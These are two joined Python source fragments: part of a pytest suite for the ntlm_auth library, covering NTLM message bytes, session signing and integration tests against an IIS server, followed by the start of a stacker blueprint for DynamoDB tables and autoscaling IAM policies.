b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_ntlm_context = Ntlm()
test_ntlm_context.create_negotiate_message("Domain", "COMPUTER")
test_ntlm_context.parse_challenge_message(test_challenge_string)
expected_message = base64.b64encode(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x03\x00\x00\x00\x18\x00\x18\x00"
b"\x6c\x00\x00\x00\x54\x00\x54\x00"
b"\x84\x00\x00\x00\x0c\x00\x0c\x00"
b"\x48\x00\x00\x00\x08\x00\x08\x00"
b"\x54\x00\x00\x00\x10\x00\x10\x00"
b"\x5c\x00\x00\x00\x10\x00\x10\x00"
b"\xd8\x00\x00\x00\x31\x82\x8a\xe2"
b"\x05\x01\x28\x0a\x00\x00\x00\x0f"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x55\x00\x73\x00"
b"\x65\x00\x72\x00\x43\x00\x4f\x00"
b"\x4d\x00\x50\x00\x55\x00\x54\x00"
b"\x45\x00\x52\x00\x86\xc3\x50\x97"
b"\xac\x9c\xec\x10\x25\x54\x76\x4a"
b"\x57\xcc\xcc\x19\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\x68\xcd\x0a\xb8"
b"\x51\xe5\x1c\x96\xaa\xbc\x92\x7b"
b"\xeb\xef\x6a\x1c\x01\x01\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\x00\x00\x00\x00"
b"\x02\x00\x0c\x00\x44\x00\x6f\x00"
b"\x6d\x00\x61\x00\x69\x00\x6e\x00"
b"\x01\x00\x0c\x00\x53\x00\x65\x00"
b"\x72\x00\x76\x00\x65\x00\x72\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\xc5\xda\xd2\x54\x4f\xc9\x79\x90"
b"\x94\xce\x1c\xe9\x0b\xc9\xd0\x3e"
)
actual_message = \
test_ntlm_context.create_authenticate_message("User", "Password",
"Domain", "COMPUTER")
actual_session_security = test_ntlm_context.session_security
assert actual_message == expected_message
assert actual_session_security is not None
def test_create_authenticate_message_without_security(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.messages.get_version',
lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key',
lambda: b"\x55" * 16)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
lambda: b"\x00" * 8)
test_challenge_string = base64.b64encode(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x03\x92\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_ntlm_context = Ntlm()
test_ntlm_context.create_negotiate_message("Domain", "COMPUTER")
test_ntlm_context.parse_challenge_message(test_challenge_string)
expected_message = base64.b64encode(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x03\x00\x00\x00\x18\x00\x18\x00"
b"\x6c\x00\x00\x00\x54\x00\x54\x00"
b"\x84\x00\x00\x00\x0c\x00\x0c\x00"
b"\x48\x00\x00\x00\x08\x00\x08\x00"
b"\x54\x00\x00\x00\x10\x00\x10\x00"
b"\x5c\x00\x00\x00\x10\x00\x10\x00"
b"\xd8\x00\x00\x00\x01\x92\x8a\xe2"
b"\x05\x01\x28\x0a\x00\x00\x00\x0f"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x55\x00\x73\x00"
b"\x65\x00\x72\x00\x43\x00\x4f\x00"
b"\x4d\x00\x50\x00\x55\x00\x54\x00"
b"\x45\x00\x52\x00\x86\xc3\x50\x97"
b"\xac\x9c\xec\x10\x25\x54\x76\x4a"
b"\x57\xcc\xcc\x19\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\x68\xcd\x0a\xb8"
b"\x51\xe5\x1c\x96\xaa\xbc\x92\x7b"
b"\xeb\xef\x6a\x1c\x01\x01\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\x00\x00\x00\x00"
b"\x02\x00\x0c\x00\x44\x00\x6f\x00"
b"\x6d\x00\x61\x00\x69\x00\x6e\x00"
b"\x01\x00\x0c\x00\x53\x00\x65\x00"
b"\x72\x00\x76\x00\x65\x00\x72\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\xc5\xda\xd2\x54\x4f\xc9\x79\x90"
b"\x94\xce\x1c\xe9\x0b\xc9\xd0\x3e"
)
actual_message = \
test_ntlm_context.create_authenticate_message("User", "Password",
"Domain", "COMPUTER")
actual_session_security = test_ntlm_context.session_security
assert actual_message == expected_message
assert actual_session_security is None
# now test the properties map up the the correct NtlmContext ones
assert test_ntlm_context.authenticate_message == \
test_ntlm_context._context._authenticate_message
test_ntlm_context.authenticate_message = b"1"
assert test_ntlm_context._context._authenticate_message == b"1"
assert test_ntlm_context.challenge_message == \
test_ntlm_context._context._challenge_message
test_ntlm_context.challenge_message = b"2"
assert test_ntlm_context._context._challenge_message == b"2"
assert test_ntlm_context.negotiate_flags == \
test_ntlm_context._context.negotiate_flags
test_ntlm_context.negotiate_flags = 1
assert test_ntlm_context._context.negotiate_flags == 1
assert test_ntlm_context.negotiate_message == \
test_ntlm_context._context._negotiate_message
test_ntlm_context.negotiate_message = b"3"
assert test_ntlm_context._context._negotiate_message == b"3"
assert test_ntlm_context.ntlm_compatibility == \
test_ntlm_context._context.ntlm_compatibility
test_ntlm_context.ntlm_compatibility = 2
assert test_ntlm_context._context.ntlm_compatibility == 2
assert test_ntlm_context.session_security == \
test_ntlm_context._context._session_security
test_ntlm_context.session_security = b"4"
assert test_ntlm_context._context._session_security == b"4"
class TestNtlmContext(object):
def test_ntlm_context(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.messages.get_version',
lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key',
lambda: b"\x55" * 16)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
lambda: b"\x00" * 8)
ch = 'E3CA49271E5089CC48CE82109F1324F41DBEDDC29A777410C738F7868C4FF405'
cbt_data = GssChannelBindingsStruct()
cbt_data[cbt_data.APPLICATION_DATA] = b"tls-server-end-point:" + \
base64.b16decode(ch)
ntlm_context = NtlmContext("User", "Password", "Domain", "COMPUTER",
cbt_data=cbt_data)
actual_nego = ntlm_context.step()
expected_nego = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00" \
b"\x01\x00\x00\x00\x31\xb0\x88\xe2" \
b"\x06\x00\x06\x00\x28\x00\x00\x00" \
b"\x08\x00\x08\x00\x2e\x00\x00\x00" \
b"\x05\x01\x28\x0a\x00\x00\x00\x0f" \
b"\x44\x6f\x6d\x61\x69\x6e\x43\x4f" \
b"\x4d\x50\x55\x54\x45\x52"
assert actual_nego == expected_nego
assert not ntlm_context.mic_present
assert not ntlm_context.complete
challenge_msg = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00" \
b"\x02\x00\x00\x00\x2f\x82\x88\xe2" \
b"\x38\x00\x00\x00\x33\x82\x8a\xe2" \
b"\x01\x23\x45\x67\x89\xab\xcd\xef" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x24\x00\x24\x00\x44\x00\x00\x00" \
b"\x06\x00\x70\x17\x00\x00\x00\x0f" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x00\x00\x00\x00"
actual_auth = ntlm_context.step(challenge_msg)
expected_auth = b'\x4e\x54\x4c\x4d\x53\x53\x50\x00' \
b'\x03\x00\x00\x00\x18\x00\x18\x00' \
b'\x6c\x00\x00\x00\x68\x00\x68\x00' \
b'\x84\x00\x00\x00\x0c\x00\x0c\x00' \
b'\x48\x00\x00\x00\x08\x00\x08\x00' \
b'\x54\x00\x00\x00\x10\x00\x10\x00' \
b'\x5c\x00\x00\x00\x10\x00\x10\x00' \
b'\xec\x00\x00\x00\x31\x82\x8a\xe2' \
b'\x05\x01\x28\x0a\x00\x00\x00\x0f' \
b'\x44\x00\x6f\x00\x6d\x00\x61\x00' \
b'\x69\x00\x6e\x00\x55\x00\x73\x00' \
b'\x65\x00\x72\x00\x43\x00\x4f\x00' \
b'\x4d\x00\x50\x00\x55\x00\x54\x00' \
b'\x45\x00\x52\x00\x86\xc3\x50\x97' \
b'\xac\x9c\xec\x10\x25\x54\x76\x4a' \
b'\x57\xcc\xcc\x19\xaa\xaa\xaa\xaa' \
b'\xaa\xaa\xaa\xaa\x04\x10\xc4\x7a' \
b'\xcf\x19\x97\x89\xde\x7f\x20\x11' \
b'\x95\x7a\xea\x50\x01\x01\x00\x00' \
b'\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\xaa\xaa\xaa\xaa' \
b'\xaa\xaa\xaa\xaa\x00\x00\x00\x00' \
b'\x02\x00\x0c\x00\x44\x00\x6f\x00' \
b'\x6d\x00\x61\x00\x69\x00\x6e\x00' \
b'\x01\x00\x0c\x00\x53\x00\x65\x00' \
b'\x72\x00\x76\x00\x65\x00\x72\x00' \
b'\x0a\x00\x10\x00\x6e\xa1\x9d\xf0' \
b'\x66\xda\x46\x22\x05\x1f\x9c\x4f' \
b'\x92\xc6\xdf\x74\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\xe5\x69\x95\x1d' \
b'\x15\xd4\x73\x5f\x49\xe1\x4c\xf9' \
b'\xa7\xd3\xe6\x72'
assert actual_auth == expected_auth
assert ntlm_context.complete
assert not ntlm_context.mic_present
request_msg = b"test req"
response_msg = b"test res"
actual_wrapped = ntlm_context.wrap(request_msg)
expected_wrapped = b"\x01\x00\x00\x00\xbc\xe3\x23\xa1" \
b"\x72\x06\x23\x78\x00\x00\x00\x00" \
b"\x70\x80\x1e\x11\xfe\x6b\x3a\xad"
assert actual_wrapped == expected_wrapped
server_sec = SessionSecurity(
ntlm_context._session_security.negotiate_flags,
ntlm_context._session_security.exported_session_key, "server"
)
server_unwrap = server_sec.unwrap(actual_wrapped[16:],
actual_wrapped[0:16])
assert server_unwrap == request_msg
response_wrapped = server_sec.wrap(response_msg)
actual_unwrap = ntlm_context.unwrap(
response_wrapped[1] + response_wrapped[0]
)
assert actual_unwrap == response_msg
def test_ntlm_context_with_mic(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.messages.get_version', lambda s: b"\x05\x01\x28\x0A\x00\x00\x00\x0F")
monkeypatch.setattr('ntlm_auth.messages.get_random_export_session_key', lambda: b"\x55" * 16)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp', lambda: b"\x00" * 8)
ch = 'E3CA49271E5089CC48CE82109F1324F41DBEDDC29A777410C738F7868C4FF405'
cbt_data = GssChannelBindingsStruct()
cbt_data[cbt_data.APPLICATION_DATA] = b"tls-server-end-point:" + \
base64.b16decode(ch)
ntlm_context = NtlmContext("User", "Password", "Domain", "COMPUTER",
cbt_data=cbt_data)
ntlm_context.reset_rc4_state() # Verifies it won't fail when the session security isn't set up.
actual_nego = ntlm_context.step()
expected_nego = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00" \
b"\x01\x00\x00\x00\x31\xb0\x88\xe2" \
b"\x06\x00\x06\x00\x28\x00\x00\x00" \
b"\x08\x00\x08\x00\x2e\x00\x00\x00" \
b"\x05\x01\x28\x0a\x00\x00\x00\x0f" \
b"\x44\x6f\x6d\x61\x69\x6e\x43\x4f" \
b"\x4d\x50\x55\x54\x45\x52"
assert actual_nego == expected_nego
assert not ntlm_context.mic_present
assert not ntlm_context.complete
challenge_msg = b"\x4E\x54\x4C\x4D\x53\x53\x50\x00" \
b"\x02\x00\x00\x00\x00\x00\x00\x00" \
b"\x38\x00\x00\x00\x33\x82\x8A\xE2" \
b"\x01\x23\x45\x67\x89\xAB\xCD\xEF" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x30\x00\x30\x00\x38\x00\x00\x00" \
b"\x06\x01\xB1\x1D\x00\x00\x00\x0F" \
b"\x02\x00\x0C\x00\x44\x00\x6F\x00" \
b"\x6D\x00\x61\x00\x69\x00\x6E\x00" \
b"\x01\x00\x0C\x00\x53\x00\x65\x00" \
b"\x72\x00\x76\x00\x65\x00\x72\x00" \
b"\x07\x00\x08\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00"
actual_auth = ntlm_context.step(challenge_msg)
expected_auth = b'\x4E\x54\x4C\x4D\x53\x53\x50\x00' \
b'\x03\x00\x00\x00\x18\x00\x18\x00' \
b'\x7C\x00\x00\x00\x7C\x00\x7C\x00' \
b'\x94\x00\x00\x00\x0C\x00\x0C\x00' \
b'\x58\x00\x00\x00\x08\x00\x08\x00' \
b'\x64\x00\x00\x00\x10\x00\x10\x00' \
b'\x6C\x00\x00\x00\x10\x00\x10\x00' \
b'\x10\x01\x00\x00\x31\x82\x8A\xE2' \
b'\x05\x01\x28\x0A\x00\x00\x00\x0F' \
b'\xC4\x45\x2C\xF7\xA8\x1E\x4D\x11' \
b'\xD0\x78\x18\x94\x09\x57\x5D\x9E' \
b'\x44\x00\x6F\x00\x6D\x00\x61\x00' \
b'\x69\x00\x6E\x00\x55\x00\x73\x00' \
b'\x65\x00\x72\x00\x43\x00\x4F\x00' \
b'\x4D\x00\x50\x00\x55\x00\x54\x00' \
b'\x45\x00\x52\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\xA1\x3D\x03\x8A' \
b'\xD0\xCA\x02\x64\x33\x89\x7C\x33' \
b'\x5E\x0F\x56\xDF\x01\x01\x00\x00' \
b'\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\xAA\xAA\xAA\xAA' \
b'\xAA\xAA\xAA\xAA\x00\x00\x00\x00' \
b'\x02\x00\x0C\x00\x44\x00\x6F\x00' \
b'\x6D\x00\x61\x00\x69\x00\x6E\x00' \
b'\x01\x00\x0C\x00\x53\x00\x65\x00' \
b'\x72\x00\x76\x00\x65\x00\x72\x00' \
b'\x07\x00\x08\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\x06\x00\x04\x00' \
b'\x02\x00\x00\x00\x0A\x00\x10\x00' \
b'\x6E\xA1\x9D\xF0\x66\xDA\x46\x22' \
b'\x05\x1F\x9C\x4F\x92\xC6\xDF\x74' \
b'\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x1D\x08\x89\xD1\xA5\xEE\xED\x21' \
b'\x91\x9E\x1A\xB8\x27\xC3\x0B\x17'
assert actual_auth == expected_auth
assert ntlm_context.complete
assert ntlm_context.mic_present
request_msg = b"test req"
response_msg = b"test res"
actual_wrapped = ntlm_context.wrap(request_msg)
expected_wrapped = b"\x01\x00\x00\x00\xbc\xe3\x23\xa1" \
b"\x72\x06\x23\x78\x00\x00\x00\x00" \
b"\x70\x80\x1e\x11\xfe\x6b\x3a\xad"
assert actual_wrapped == expected_wrapped
server_sec = SessionSecurity(
ntlm_context._session_security.negotiate_flags,
ntlm_context._session_security.exported_session_key, "server"
)
server_unwrap = server_sec.unwrap(actual_wrapped[16:],
actual_wrapped[0:16])
assert server_unwrap == request_msg
response_wrapped = server_sec.wrap(response_msg)
actual_unwrap = ntlm_context.unwrap(
response_wrapped[1] + response_wrapped[0]
)
assert actual_unwrap == response_msg
msg = b"Hello"
actual_sig1 = ntlm_context.sign(msg)
expected_sig1 = b"\x01\x00\x00\x00\x08\xF0\x0D\x86\x34\x05\x1A\x1D\x01\x00\x00\x00"
assert actual_sig1 == expected_sig1
server_sec.verify_signature(msg, actual_sig1)
actual_sig2 = ntlm_context.sign(msg)
expected_sig2 = b"\x01\x00\x00\x00\x07\x64\x0C\x30\x1C\xD7\x76\xF0\x02\x00\x00\x00"
assert actual_sig2 == expected_sig2
server_sec.verify_signature(msg, actual_sig2)
ntlm_context.reset_rc4_state()
actual_sig3 = ntlm_context.sign(msg)
expected_sig3 = b"\x01\x00\x00\x00\x1E\xD4\xA3\xE5\xE8\x05\x74\x01\x03\x00\x00\x00"
assert actual_sig3 == expected_sig3
server_sec.reset_rc4_state(outgoing=False)
server_sec.verify_signature(msg, actual_sig3)
server_sig = server_sec.get_signature(msg)
ntlm_context.verify(msg, server_sig)
def test_fail_wrap_no_context(self):
ntlm_context = NtlmContext("", "")
with pytest.raises(NoAuthContextError) as err:
ntlm_context.wrap(b"")
assert str(err.value) == \
"Cannot wrap data as no security context has been established"
with pytest.raises(NoAuthContextError) as err:
ntlm_context.unwrap(b"")
assert str(err.value) == \
"Cannot unwrap data as no security context has been established"
class TestNtlmFunctional(object):
"""
These tests are functional tests to test out the NTLM calculations and
message structures with an actual Microsoft server rather than documented
examples. Because it is reliant on IIS being present this can only run on
the tests on appveyor and not travis-ci or locally. If these tests past it
is a fairly good indication that everything works as expected in a real
life scenario.
This will test out all 4 NTLM compatibility levels (0-3) that affect client
behaviour and test out their response code as well as if we can get the IIS
page's contents. The credentials, urls and expected contents are all set up
in the appveyor/setup_iis.ps1 script. There are 4 types of scenarios that
will be tested with each compatibility level;
1. A HTTP site that has Extended Protection set to None
2. A HTTP site that has Extended Protection set to Require (CBT Required)
3. A HTTPS site that has Extended Protection set to None
4. A HTTPS site that has Extended Protection set to Require (CBT Required)
Theoretically 1 and 2 are the same as CBT is only checked when running over
HTTPS but it is best to verify. Scenario 4 would only work when running
with the compatibility level of 3 as CBT support was only added in NTLMv2
authentication.
"""
@pytest.fixture(scope='class', autouse=True)
def runner(self):
server = os.environ.get('NTLM_SERVER', None)
domain = os.environ.get('NTLM_DOMAIN', '')
username = os.environ.get('NTLM_USERNAME', None)
password = os.environ.get('NTLM_PASSWORD', None)
if server and username and password:
return server, domain, username, password
else:
pytest.skip("NTLM_USERNAME, NTLM_PASSWORD, NTLM_SERVER "
"environment variables were not set, integration "
"tests will be skipped")
def test_ntlm_0_http_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
81, 0)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_0_http_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
82, 0)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_0_https_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
441, 0)
actual_code = actual.status_code
# CBT is not support in ntlm levels less than 3, expected a 401
assert actual_code == 401
def test_ntlm_0_https_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
442, 0)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_1_http_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
81, 1)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_1_http_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
82, 1)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_1_https_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
441, 1)
actual_code = actual.status_code
# CBT is not support in ntlm levels less than 3, expected a 401
assert actual_code == 401
def test_ntlm_1_https_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
442, 1)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_2_http_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
81, 2)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_2_http_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
82, 2)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_2_https_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
441, 2)
actual_code = actual.status_code
# CBT is not support in ntlm levels less than 3, expected a 401
assert actual_code == 401
def test_ntlm_2_https_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
442, 2)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_http_with_cbt_dep(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
81, 3)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_http_without_cbt_dep(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
82, 3)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_https_with_cbt_dep(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
441, 3)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
# Only case where CBT should work as we are using NTLMv2 as the auth
# type
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_https_without_cbt_dep(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
442, 3)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_http_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
81, 3, legacy=False)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_http_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
82, 3, legacy=False)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_https_with_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
441, 3, legacy=False)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
# Only case where CBT should work as we are using NTLMv2 as the auth
# type
assert actual_code == 200
assert actual_content == "contents"
def test_ntlm_3_https_without_cbt(self, runner):
actual = self._send_request(runner[0], runner[1], runner[2], runner[3],
442, 3, legacy=False)
actual_content = actual.content.decode('utf-8')
actual_code = actual.status_code
assert actual_code == 200
assert actual_content == "contents"
def _send_request(self, server, domain, username, password, port,
ntlm_compatibility, legacy=True):
"""
Sends a request to the url with the credentials specified. Returns the
final response
"""
# filter out warnings around older Python and unverified connections
try:
from requests.packages.urllib3.exceptions import \
InsecurePlatformWarning
warnings.simplefilter('ignore', category=InsecurePlatformWarning)
except ImportError:
pass
try:
from requests.packages.urllib3.exceptions import SNIMissingWarning
warnings.simplefilter('ignore', category=SNIMissingWarning)
except ImportError:
pass
try:
from urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore', category=InsecureRequestWarning)
except ImportError:
pass
url = "%s://%s:%d/contents.txt" \
% ('http' if str(port).startswith('8') else 'https',
server, port)
session = requests.Session()
session.verify = False
session.auth = NtlmAuth(domain, username, password, ntlm_compatibility,
legacy)
request = requests.Request('GET', url)
prepared_request = session.prepare_request(request)
response = session.send(prepared_request)
return response
# used by the functional tests to auth with an NTLM endpoint
class NtlmAuth(AuthBase):
def __init__(self, domain, username, password, ntlm_compatibility, legacy):
self.username = username
self.domain = domain.upper()
self.password = password
self.ntlm_compatibility = ntlm_compatibility
self.legacy = legacy
def __call__(self, response):
response.headers['Connection'] = 'Keep-Alive'
response.register_hook('response', self.hook)
return response
def hook(self, response, **kwargs):
if response.status_code == 401:
if self.legacy:
return self.retry_with_ntlm_auth_legacy('www-authenticate',
'Authorization',
response, 'NTLM',
kwargs)
else:
return self.retry_with_ntlm_auth('www-authenticate',
'Authorization', response,
'NTLM', kwargs)
else:
return response
def retry_with_ntlm_auth(self, auth_header_field, auth_header, response,
auth_type, args):
try:
cert_hash = self._get_server_cert(response)
cbt_data = GssChannelBindingsStruct()
cbt_data[cbt_data.APPLICATION_DATA] = b"tls-server-end-point:" + \
base64.b16decode(cert_hash)
except Exception:
cbt_data = None
context = NtlmContext(self.username, self.password, self.domain,
cbt_data=cbt_data,
ntlm_compatibility=self.ntlm_compatibility)
# Consume the original response contents and release the connection for
# later
response.content
response.raw.release_conn()
# Create the negotiate request
msg1_req = response.request.copy()
msg1 = context.step()
msg1_header = "%s %s" % (auth_type, base64.b64encode(msg1).decode())
msg1_req.headers[auth_header] = msg1_header
# Send the negotiate request and receive the challenge message
disable_stream_args = dict(args, stream=False)
msg2_resp = response.connection.send(msg1_req, **disable_stream_args)
msg2_resp.content
msg2_resp.raw.release_conn()
# Parse the challenge response in the ntlm_context
msg2_header = msg2_resp.headers[auth_header_field]
msg2 = msg2_header.replace(auth_type + ' ', '')
msg3 = context.step(base64.b64decode(msg2))
# Create the authenticate request
msg3_req = msg2_resp.request.copy()
msg3_header = auth_type + ' ' + base64.b64encode(msg3).decode()
msg3_req.headers[auth_header] = msg3_header
# Send the authenticate request
final_response = msg2_resp.connection.send(msg3_req, **args)
final_response.history.append(response)
final_response.history.append(msg2_resp)
return final_response
def retry_with_ntlm_auth_legacy(self, auth_header_field, auth_header,
response, auth_type, args):
try:
cert_hash = self._get_server_cert(response)
except Exception:
cert_hash = None
context = Ntlm(ntlm_compatibility=self.ntlm_compatibility)
# Consume the original response contents and release the connection for
# later
response.content
response.raw.release_conn()
# Create the negotiate request
msg1_req = response.request.copy()
msg1 = context.create_negotiate_message(self.domain)
msg1_header = "%s %s" % (auth_type, msg1.decode('ascii'))
msg1_req.headers[auth_header] = msg1_header
# Send the negotiate request and receive the challenge message
disable_stream_args = dict(args, stream=False)
msg2_resp = response.connection.send(msg1_req, **disable_stream_args)
msg2_resp.content
msg2_resp.raw.release_conn()
# Parse the challenge response in the ntlm_context
msg2_header = msg2_resp.headers[auth_header_field]
msg2 = msg2_header.replace(auth_type + ' ', '')
context.parse_challenge_message(msg2)
# Create the authenticate request
msg3_req = msg2_resp.request.copy()
msg3 = context.create_authenticate_message(
self.username, self.password, self.domain,
server_certificate_hash=cert_hash
)
msg3_header = auth_type + ' ' + msg3.decode('ascii')
msg3_req.headers[auth_header] = msg3_header
# Send the authenticate request
final_response = msg2_resp.connection.send(msg3_req, **args)
final_response.history.append(response)
final_response.history.append(msg2_resp)
return final_response
def _get_server_cert(self, response):
if sys.version_info > (3, 0):
socket = response.raw._fp.fp.raw._sock
else:
socket = response.raw._fp.fp._sock
server_certificate = socket.getpeercert(True)
hash_object = hashlib.sha256(server_certificate)
server_certificate_hash = hash_object.hexdigest().upper()
return server_certificate_hash
| |
from stacker.blueprints.base import Blueprint
from stacker.blueprints.variables.types import TroposphereType
from troposphere import (
iam,
applicationautoscaling as aas,
dynamodb,
Ref,
GetAtt,
Output,
Sub,
)
from .policies import (
dynamodb_autoscaling_policy,
)
# TODO: Factor out the below two functions, once this PR is merged:
# https://github.com/cloudtools/awacs/pull/93
# from awacs.helpers.trust import get_application_autoscaling_assumerole_policy
from awacs.helpers.trust import make_simple_assume_policy
def make_service_domain_name(service, region=''):
"""Helper function for creating proper service domain names."""
tld = ".com.cn" if region == "cn-north-1" else ".com"
return "{}.amazonaws{}".format(service, tld)
def get_application_autoscaling_assumerole_policy(region=''):
""" Helper function for building the AWS Lambda AssumeRole Policy"""
service = make_service_domain_name('application-autoscaling', region)
return make_simple_assume_policy(service)
# end of TODO.
def snake_to_camel_case(name):
"""
Accept a snake_case string and return a CamelCase string.
For example::
>>> snake_to_camel_case('cidr_block')
'CidrBlock'
"""
name = name.replace("-", "_")
return "".join(word.capitalize() for word in name.split("_"))
class DynamoDB(Blueprint):
"""Manages the creation of DynamoDB tables.
Example::
- name: users
class_path: stacker_blueprints.dynamodb.DynamoDB
variables:
Tables:
UserTable:
TableName: prod-user-table
KeySchema:
- AttributeName: id
KeyType: HASH
- AttributeName: name
KeyType: RANGE
AttributeDefinitions:
- AttributeName: id
AttributeType: S
- AttributeName: name
AttributeType: S
